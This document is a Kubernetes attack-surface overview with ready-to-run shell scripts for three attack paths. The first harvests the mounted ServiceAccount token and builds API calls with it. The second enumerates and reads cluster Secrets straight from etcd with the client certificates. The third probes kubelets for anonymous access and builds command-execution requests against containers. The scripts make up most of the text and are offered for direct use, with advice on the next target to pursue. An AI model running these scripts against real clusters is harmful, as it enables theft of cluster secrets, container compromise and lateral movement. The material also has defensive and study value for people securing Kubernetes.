Kubernetes Attack Surface
This is a short (and incomplete) overview of the attack surface for a Kubernetes cluster.
ServiceAccounts
A Kubernetes ServiceAccount is the identity a pod uses to talk to the K8s API.
By default the namespace's default ServiceAccount token is mounted into every pod (automountServiceAccountToken is true unless the pod or the account says otherwise), and the RBAC bindings attached to that account may grant privileges the workload never needed.
As an example, a ServiceAccount might be able to list all pods in a namespace or list and read secrets.
The default mount location is /var/run/secrets/kubernetes.io/serviceaccount.
In this directory the token, the CA cert (ca.crt) and the namespace are stored.
You can use those to talk to the K8s API; the server address is what the pod sees in the KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT environment variables, and a harmless first query is to ask what the identity is allowed to do:
kubectl --server=https://<apiserver>:<port> --token=<token> --certificate-authority=<ca> auth can-i --list
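Before firing requests at the API it pays to know which identity the mounted token actually represents. The following is an added example, not part of the original page: it decodes the claims of a ServiceAccount JWT (no signature check, we hold the token anyway), derives namespace and account name from the sub claim, and composes the kubectl and curl calls from the text. It assumes only the mount path above, the in-cluster KUBERNETES_SERVICE_HOST/PORT variables and a base64(1) that understands -d; the sample token is constructed and unsigned so the decoding runs offline.

```shell
#!/bin/sh
# Added example (not from the original page): triage a mounted ServiceAccount
# token from inside a pod before touching the API.
# Assumptions: the standard mount path from the text, the in-cluster env vars
# KUBERNETES_SERVICE_HOST / KUBERNETES_SERVICE_PORT, and base64(1) with -d.

SA_DIR=/var/run/secrets/kubernetes.io/serviceaccount

# JWT segments are base64url without padding; convert to/from standard base64.
b64url_encode() { base64 | tr -d '\n=' | tr '/+' '_-'; }

b64url_decode() {
  s=$(printf '%s' "$1" | tr '_-' '/+')
  case $(( ${#s} % 4 )) in
    2) s="${s}==" ;;
    3) s="${s}=" ;;
  esac
  printf '%s' "$s" | base64 -d
}

# The second segment of a JWT is the claims JSON. No signature check: we hold
# the token, we only want to know which identity it represents.
jwt_payload() { b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"; }

# Extract one string claim from the (single-line) claims JSON: jwt_claim "$token" sub
jwt_claim() {
  jwt_payload "$1" | sed -n "s|.*\"$2\":\"\([^\"]*\)\".*|\1|p"
}

# sub is system:serviceaccount:<namespace>:<name> for every SA token
sa_namespace() { jwt_claim "$1" sub | cut -d: -f3; }
sa_name()      { jwt_claim "$1" sub | cut -d: -f4; }

# API server as the pod sees it
api_url() {
  printf 'https://%s:%s' "${KUBERNETES_SERVICE_HOST:-kubernetes.default.svc}" \
                         "${KUBERNETES_SERVICE_PORT:-443}"
}

# The kubectl call from the text, completed with --server and a harmless
# first query: everything this identity may do in its own namespace.
sa_kubectl_cmd() { # $1 token file, $2 CA file, $3 namespace
  printf 'kubectl --server=%s --token="$(cat %s)" --certificate-authority=%s -n %s auth can-i --list' \
    "$(api_url)" "$1" "$2" "$3"
}

# Same probe with curl for images that ship no kubectl (expect 403 if the
# SA may not list pods, 401 if the token is rejected outright).
sa_curl_cmd() { # $1 token file, $2 CA file, $3 namespace
  printf 'curl -s --cacert %s -H "Authorization: Bearer $(cat %s)" %s/api/v1/namespaces/%s/pods' \
    "$2" "$1" "$(api_url)" "$3"
}

# Constructed sample token (unsigned, demo only) so the decoding runs offline.
SAMPLE_CLAIMS='{"iss":"kubernetes/serviceaccount","sub":"system:serviceaccount:kube-system:default"}'
SAMPLE_TOKEN="$(printf '%s' '{"alg":"RS256","kid":"demo"}' | b64url_encode).$(printf '%s' "$SAMPLE_CLAIMS" | b64url_encode).c2lnbmF0dXJl"

echo "sample token is $(sa_name "$SAMPLE_TOKEN") in namespace $(sa_namespace "$SAMPLE_TOKEN")"

# Inside a real pod: the mount also carries a 'namespace' file next to the token.
if [ -r "$SA_DIR/token" ]; then
  TOKEN=$(cat "$SA_DIR/token")
  NS=$(cat "$SA_DIR/namespace")
  echo "mounted token: $(jwt_claim "$TOKEN" sub) (namespace file says $NS)"
  echo "next: $(sa_kubectl_cmd "$SA_DIR/token" "$SA_DIR/ca.crt" "$NS")"
  echo "  or: $(sa_curl_cmd "$SA_DIR/token" "$SA_DIR/ca.crt" "$NS")"
fi
```

Run it as-is inside a pod: it prints the identity and the two commands to paste next. The can-i --list query is deliberately the first call because it is read-only and tells you immediately whether the token is worth anything beyond its own namespace.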
Etcd
Etcd is the ‘main database’ for Kubernetes: every API object, Secrets included, is stored under the /registry/ prefix.
If you gain access to etcd (network access to the client port plus the etcd client certificate and key, which normally live on the control-plane nodes), you can list all secrets in the cluster and read their values, which are stored in plaintext unless encryption at rest is configured on the API server.
Use etcdctl.
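As an added example (not the page's own code), the script below wraps etcdctl for the v3 API with mTLS, enumerates the Secret keys under /registry/secrets without pulling their values, and classifies a stored value by its prefix to tell whether encryption at rest is actually in place: values written through an EncryptionConfiguration start with k8s:enc:<provider>:<version>:<keyname>:, plain protobuf values start with k8s. The endpoint and certificate paths are placeholders (kubeadm defaults) and the sample keys and values are constructed, so the classifiers run without an etcd.

```shell
#!/bin/sh
# Added example (not from the original page): read Secrets straight out of
# etcd and tell whether encryption at rest would have stopped you.
# Assumptions: etcd v3 API on the default client port 2379, and the etcd
# client certificate/key files (paths below are kubeadm-style placeholders).

ETCD_ENDPOINT=${ETCD_ENDPOINT:-https://127.0.0.1:2379}
ETCD_CA=${ETCD_CA:-/etc/kubernetes/pki/etcd/ca.crt}
ETCD_CERT=${ETCD_CERT:-/etc/kubernetes/pki/etcd/healthcheck-client.crt}
ETCD_KEY=${ETCD_KEY:-/etc/kubernetes/pki/etcd/healthcheck-client.key}

# Kubernetes keeps every object under /registry/<resource>/<namespace>/<name>.
secret_key_namespace() { printf '%s\n' "$1" | cut -d/ -f4; }
secret_key_name()      { printf '%s\n' "$1" | cut -d/ -f5; }

# Values are stored as protobuf (magic "k8s\0") unless an EncryptionConfiguration
# is active, in which case they start with k8s:enc:<provider>:<version>:<keyname>:.
etcd_value_state() {
  case "$1" in
    k8s:enc:kms:*)       echo "encrypted:kms" ;;
    k8s:enc:aescbc:*)    echo "encrypted:aescbc" ;;
    k8s:enc:aesgcm:*)    echo "encrypted:aesgcm" ;;
    k8s:enc:secretbox:*) echo "encrypted:secretbox" ;;
    k8s*)                echo "plaintext" ;;
    *)                   echo "unknown" ;;
  esac
}

# etcdctl with the v3 API and client certificate authentication.
etcdctl_v3() {
  ETCDCTL_API=3 etcdctl --endpoints="$ETCD_ENDPOINT" \
    --cacert="$ETCD_CA" --cert="$ETCD_CERT" --key="$ETCD_KEY" "$@"
}

# List all Secrets in the cluster without pulling their values.
list_secret_keys() { etcdctl_v3 get /registry/secrets --prefix --keys-only; }

# First bytes of one stored value: enough to classify it (NULs dropped so the
# shell does not complain about the protobuf magic).
secret_value_prefix() { etcdctl_v3 get "$1" --print-value-only | head -c 16 | tr -d '\0'; }

# Constructed sample key and value prefixes (no etcd needed) for the classifiers:
SAMPLE_KEY='/registry/secrets/kube-system/bootstrap-token-abcdef'
SAMPLE_PLAIN='k8s'
SAMPLE_ENC='k8s:enc:aescbc:v1:key1:'

echo "$SAMPLE_KEY -> ns=$(secret_key_namespace "$SAMPLE_KEY") name=$(secret_key_name "$SAMPLE_KEY")"
echo "plain value -> $(etcd_value_state "$SAMPLE_PLAIN")"
echo "aescbc value -> $(etcd_value_state "$SAMPLE_ENC")"

# On a control-plane node with etcdctl and the certs in place, walk every Secret.
# --keys-only prints a blank line after each key, hence the empty-line skip.
if command -v etcdctl >/dev/null 2>&1 && [ -r "$ETCD_KEY" ]; then
  list_secret_keys | while read -r key; do
    [ -n "$key" ] || continue
    echo "$(secret_key_namespace "$key")/$(secret_key_name "$key"): $(etcd_value_state "$(secret_value_prefix "$key")")"
  done
fi
```

If every value comes back as encrypted:kms or encrypted:aescbc, etcd access alone is not enough and the next target is the API server's encryption key or KMS plugin; if values are plaintext, etcdctl get with --print-value-only hands you the Secret data directly.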
Kubelet
Kubelet runs on every node in the cluster and exposes its own HTTPS API (port 10250 by default).
If anonymous access is enabled on that API, it might be possible to list the pods that are running on that node and interact with them.
You can use this to gain a shell or execute commands inside a pod and pivot into or away from the cluster.
Use kubeletctl.
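Whether the kubelet is open is decided by two flags, anonymous-auth and authorization-mode, and an unauthenticated GET /pods tells you both with one status code. The script below is an added example, not from the page or from kubeletctl: it interprets that status, probes the authenticated port 10250 and the legacy read-only port 10255, and builds the POST to the kubelet's /run endpoint that executes a command in a container (the call kubeletctl's run command makes underneath). The node address and pod/container names are inputs; the sample values are constructed. Parsing the /pods JSON is left to kubeletctl or jq.

```shell
#!/bin/sh
# Added example (not from the original page): probe a node's kubelet API for
# anonymous access and build the exec request kubeletctl would send.
# Assumptions: the kubelet's default authenticated port 10250 and the legacy
# read-only port 10255; node address and pod/container names are inputs.

# Interpret the HTTP status of an unauthenticated GET /pods on 10250:
#   200 -> anonymous auth on and authorization AlwaysAllow: full access
#   403 -> anonymous auth on, but Webhook/RBAC authz denied system:anonymous
#   401 -> anonymous auth off (--anonymous-auth=false): token/cert needed
kubelet_auth_state() {
  case "$1" in
    200)    echo "open" ;;
    403)    echo "anonymous-denied" ;;
    401)    echo "auth-required" ;;
    000|"") echo "unreachable" ;;
    *)      echo "other:$1" ;;
  esac
}

# curl's %{http_code} for the TLS endpoint (kubelet uses a self-signed cert, hence -k)
kubelet_probe() { # $1 node address, $2 port (default 10250)
  curl -sk -o /dev/null -w '%{http_code}' --connect-timeout 5 \
    "https://$1:${2:-10250}/pods"
}

# The read-only port speaks plain HTTP and needs no credentials when enabled.
kubelet_readonly_probe() { # $1 node address, $2 port (default 10255)
  curl -s -o /dev/null -w '%{http_code}' --connect-timeout 5 \
    "http://$1:${2:-10255}/pods"
}

# Exec one command in a running container through the kubelet:
# POST /run/<namespace>/<pod>/<container> with cmd=<command> in the body.
kubelet_run_cmd() { # $1 node, $2 namespace, $3 pod, $4 container, $5 command
  printf 'curl -sk -X POST --data-urlencode "cmd=%s" "https://%s:10250/run/%s/%s/%s"' \
    "$5" "$1" "$2" "$3" "$4"
}

# Constructed sample values so the logic runs without a cluster.
echo "status 200 -> $(kubelet_auth_state 200)"
echo "status 401 -> $(kubelet_auth_state 401)"
echo "exec example: $(kubelet_run_cmd 10.0.0.5 default web-0 nginx id)"

# Live probe only when a node address is supplied via the environment.
if [ -n "$KUBELET_NODE" ]; then
  code=$(kubelet_probe "$KUBELET_NODE") || true
  echo "$KUBELET_NODE:10250 -> $(kubelet_auth_state "$code")"
  ro=$(kubelet_readonly_probe "$KUBELET_NODE") || true
  echo "$KUBELET_NODE:10255 -> $(kubelet_auth_state "$ro")"
fi
```

A 403 is not the end of the road: it means the kubelet authenticated you as system:anonymous and asked the API server whether that user may access nodes/proxy, so any other credential you hold (a ServiceAccount token, a node certificate) may be accepted on the same endpoints.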